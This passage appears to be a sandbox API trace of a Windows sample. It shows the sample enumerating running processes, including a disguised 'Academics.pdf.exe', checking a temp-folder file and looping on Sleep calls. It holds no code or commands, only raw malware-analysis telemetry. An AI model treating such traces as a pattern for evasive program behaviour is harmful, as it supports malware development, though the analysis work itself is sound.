cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.952] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0292.953] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0292.954] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0292.955] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0292.956] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0292.956] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0292.957] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0292.958] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0292.959] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0292.960] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0292.961] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0292.961] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0292.962] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0292.963] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0292.964] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0292.965] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0292.966] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0292.966] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0292.967] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0292.968] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.969] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.970] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0292.987] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.988] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0292.989] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.989] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0292.990] CloseHandle (hObject=0x294) returned 1 [0292.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0292.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0292.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0292.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0292.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0292.991] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0292.991] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0292.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0292.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0292.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0292.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0292.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0292.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0292.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0292.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0292.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0292.991] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0292.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0292.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0292.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0292.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0292.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0292.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0292.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0292.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0292.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0292.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0292.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0292.992] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0292.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0292.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0292.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0292.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0292.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0292.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0292.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0292.992] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0292.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0292.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0292.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0292.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0292.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0292.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0292.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0292.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0292.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0292.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0292.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0292.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0292.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0292.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0292.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0292.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0292.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0292.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0292.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0292.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0292.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0292.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0292.993] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0292.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0292.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0292.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0292.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0292.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0292.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0292.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0292.994] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0292.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0292.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0292.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0292.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0292.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0292.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0292.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0292.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0292.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0292.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0292.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0292.995] timeGetTime () returned 0x493f4 [0292.995] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.995] Sleep (dwMilliseconds=0xa) [0292.999] timeGetTime () returned 0x49403 [0292.999] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.000] Sleep (dwMilliseconds=0xa) [0293.015] timeGetTime () returned 0x49413 [0293.015] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.015] Sleep (dwMilliseconds=0xa) [0293.032] timeGetTime () returned 0x49423 [0293.032] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.032] Sleep (dwMilliseconds=0xa) [0293.046] timeGetTime () returned 0x49432 [0293.046] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.047] Sleep (dwMilliseconds=0xa) [0293.062] timeGetTime () returned 0x49442 [0293.062] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.062] Sleep (dwMilliseconds=0xa) [0293.080] timeGetTime () returned 0x49451 [0293.080] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.080] Sleep (dwMilliseconds=0xa) [0293.094] timeGetTime () returned 0x49461 [0293.094] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.094] Sleep (dwMilliseconds=0xa) [0293.109] timeGetTime () returned 0x49471 [0293.109] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.109] Sleep (dwMilliseconds=0xa) [0293.124] timeGetTime () returned 0x49480 [0293.124] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.124] Sleep (dwMilliseconds=0xa) [0293.140] timeGetTime () returned 0x49490 [0293.140] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.140] Sleep (dwMilliseconds=0xa) [0293.156] timeGetTime () returned 0x4949f [0293.156] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.156] Sleep (dwMilliseconds=0xa) [0293.171] timeGetTime () returned 0x494af [0293.171] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.171] Sleep (dwMilliseconds=0xa) [0293.187] timeGetTime () returned 0x494bf [0293.187] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.187] Sleep (dwMilliseconds=0xa) [0293.202] timeGetTime () returned 0x494ce [0293.202] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.202] Sleep (dwMilliseconds=0xa) [0293.218] timeGetTime () returned 0x494de [0293.218] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.218] Sleep (dwMilliseconds=0xa) [0293.234] timeGetTime () returned 0x494ed [0293.234] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.234] Sleep (dwMilliseconds=0xa) [0293.249] timeGetTime () returned 0x494fd [0293.249] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.249] Sleep (dwMilliseconds=0xa) [0293.265] timeGetTime () returned 0x4950d [0293.265] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.265] Sleep (dwMilliseconds=0xa) [0293.280] timeGetTime () returned 0x4951c [0293.280] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.280] Sleep (dwMilliseconds=0xa) [0293.296] timeGetTime () returned 0x4952c [0293.296] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.296] Sleep (dwMilliseconds=0xa) [0293.312] timeGetTime () returned 0x4953b [0293.312] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.312] Sleep (dwMilliseconds=0xa) [0293.327] timeGetTime () returned 0x4954b [0293.327] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.327] Sleep (dwMilliseconds=0xa) [0293.343] timeGetTime () returned 0x4955b [0293.343] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.343] Sleep (dwMilliseconds=0xa) [0293.358] timeGetTime () returned 0x4956a [0293.359] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.359] Sleep (dwMilliseconds=0xa) [0293.375] timeGetTime () returned 0x4957a [0293.375] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.375] Sleep (dwMilliseconds=0xa) [0293.390] timeGetTime () returned 0x49589 [0293.390] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.390] Sleep (dwMilliseconds=0xa) [0293.405] timeGetTime () returned 0x49599 [0293.406] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.406] Sleep (dwMilliseconds=0xa) [0293.423] timeGetTime () returned 0x495a9 [0293.423] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.423] Sleep (dwMilliseconds=0xa) [0293.436] timeGetTime () returned 0x495b8 [0293.436] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.436] Sleep (dwMilliseconds=0xa) [0293.452] timeGetTime () returned 0x495c8 [0293.452] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.452] Sleep (dwMilliseconds=0xa) [0293.468] timeGetTime () returned 0x495d7 [0293.468] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0293.468] Sleep 